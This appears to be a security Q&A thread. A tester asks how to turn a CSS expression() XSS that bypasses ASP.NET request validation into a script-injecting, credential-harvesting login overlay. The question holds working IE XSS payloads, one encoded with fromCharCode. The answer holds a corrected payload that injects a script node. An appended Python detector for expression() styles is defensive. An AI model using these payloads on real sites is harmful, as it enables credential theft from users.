4

I've identified an XSS in a client's application where they've failed to properly sanitize a variable. The application, however, is written in ASP.NET 2.x and they have request validation turned on.

I'm aware of the below string, which will bypass request validation and work on IE:

<%tag style="xss:expression(alert(123))" >

What I want to do though, rather than show the client a simple alert box, is to use the XSS to dynamically generate a full screen iframe of the app's login page and change its post action to a credential harvesting script I host myself.

I have the code to generate this iframe and I know it works. What I'm struggling with is getting a JavaScript function to execute from within the tag style attribute. I thought the best way to achieve this would be to dynamically generate a <script src=..> node in the DOM. However, even though the code definitely works, it won't execute from within the tag style attribute.

So any suggestions on how to get proper JavaScript code execution from within a style attribute? Here is my current code (which isn't working):

<%tag style="xss:expression(
    function init()
    {
        var nBody = document.getElementsByTagName('body')[0];
        var newInclude = document.createElement('script');
        newInclude.setAttribute('src','src.js');
        nBody.appendChild(newInclude);
    }

    onload=init;
)">

Edit: thought I'd also add that this code works when converted to Unicode:

function test(){alert(1);}test();

<IMG STYLE="xss:expression(eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 116, 101, 115, 116, 40, 41, 123, 97, 108, 101, 114, 116, 40, 49, 41, 59, 125, 116, 101, 115, 116, 40, 41, 59)))">

D.W.
Jingo

1 Answer

3

An expression() must be a JavaScript expression. You have two statements, a function declaration followed by an assignment expression. Doing it with a single function expression works for me:

<div style="xss:expression(onload=function() {
    var newInclude = document.createElement('script');
    newInclude.src = 'src.js';
    document.body.appendChild(newInclude);
})">

(although I'm slightly surprised that it does without any extra layer of CSS \nn escaping!)

bobince
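Added here as a defensive example, not code from the question or the answer: a small Python checker that canonicalizes a style attribute value the way a CSS parser would (resolving the `\nn` hex escapes the answer mentions and folding case) before looking for `expression(`, so a review of stored markup or proxy logs does not miss the escaped spelling. The sample HTML and the function names are constructed for this example.

```python
import re

# CSS hex escape: backslash, 1-6 hex digits, then one optional whitespace char
_CSS_ESCAPE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?')
# Value of a style attribute, double- or single-quoted
_STYLE_ATTR = re.compile(r'\bstyle\s*=\s*(?:"([^"]*)"|\'([^\']*)\')', re.IGNORECASE)
# The IE-only expression() function, with optional whitespace before the paren
_EXPRESSION = re.compile(r'expression\s*\(')


def canonicalize_css(value: str) -> str:
    """Resolve CSS hex escapes and fold case so that an escaped or
    mixed-case 'expression(' compares equal to the plain spelling."""
    def _unescape(m: re.Match) -> str:
        cp = int(m.group(1), 16)
        # NUL, surrogates and out-of-range values decode to U+FFFD
        if cp == 0 or 0xD800 <= cp <= 0xDFFF or cp > 0x10FFFF:
            return '\ufffd'
        return chr(cp)
    return _CSS_ESCAPE.sub(_unescape, value).lower()


def style_has_expression(value: str) -> bool:
    """True if the style value invokes expression() once canonicalized."""
    return _EXPRESSION.search(canonicalize_css(value)) is not None


def find_expression_styles(html: str) -> list:
    """Return the raw value of every style attribute in html that
    resolves to an expression() call after canonicalization."""
    hits = []
    for m in _STYLE_ATTR.finditer(html):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        if style_has_expression(raw):
            hits.append(raw)
    return hits


# Constructed sample markup: one benign style, the plain payload, and the
# same payload with its first letter written as the CSS escape \65
SAMPLE_HTML = (
    '<p style="color: red; width: 100px">text</p>'
    '<div style="xss:expression(onload=function(){alert(1)})">a</div>'
    "<img style='xss:\\65xpression(alert(1))'>"
)

if __name__ == '__main__':
    for hit in find_expression_styles(SAMPLE_HTML):
        print('expression() found in style attribute:', hit)
```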